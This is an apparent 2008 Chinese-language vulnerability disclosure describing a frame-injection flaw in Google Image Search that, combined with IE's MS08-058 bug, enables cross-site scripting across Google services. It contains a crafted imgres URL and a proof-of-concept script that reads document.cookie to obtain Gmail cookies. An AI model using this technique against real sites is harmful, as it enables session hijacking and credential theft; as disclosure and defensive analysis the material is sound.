漏洞說明：Google是全球最大的搜索引擎。同時Google擁有其他龐大的WEB應用程序產品線，涉及EMAIL、BLOG、在線文檔、個人主頁、電子地圖、論壇、RSS等互聯網幾乎所有的應用業務。80sec發現Google提供的圖片搜索服務存在安全問題，結合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞，幾乎可以控制所有的Google服務和獲得目標用戶的認證信息。

漏洞站點：http://www.google.com

漏洞解析：Google提供的圖片搜索服務存在網頁框架安全問題，惡意攻擊者可以指定網頁的內嵌框架頁指向任意網頁。該服務提供的URL地址主域名可以更改成Google的其他業務的子域名，從而造成嚴重的釣魚網頁攻擊隱患。如下：黑客指定imgrefurl參數就可能構造GMAIL相關服務的釣魚網頁。

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

該漏洞結合由80SEC團隊成員發現的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞，linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網頁框架安全問題，子框架網頁可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制，可以跨域控制其他域的網頁，影響所有的WEB應用。微軟已經在08年10月提供了MS08-058補丁修復了該漏洞。

測試代碼：

將Google的漏洞頁指向MS08-058漏洞攻擊頁

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

MS08-058.htm內容


<script>
setTimeout (
function(){
parent.location.href = new String("javascript:alert(document.cookie)");
}
,1500);
</script>


即可獲得GAMIL的Cookie信息

危害提醒：

黑客利用瀏覽器漏洞可以使這種類型的低風險Web安全漏洞擴大成影響所有Web應用的高風險安全問題，請各大網站及安全管理人員仔細分析評估MS08-058類型的Web安全問題。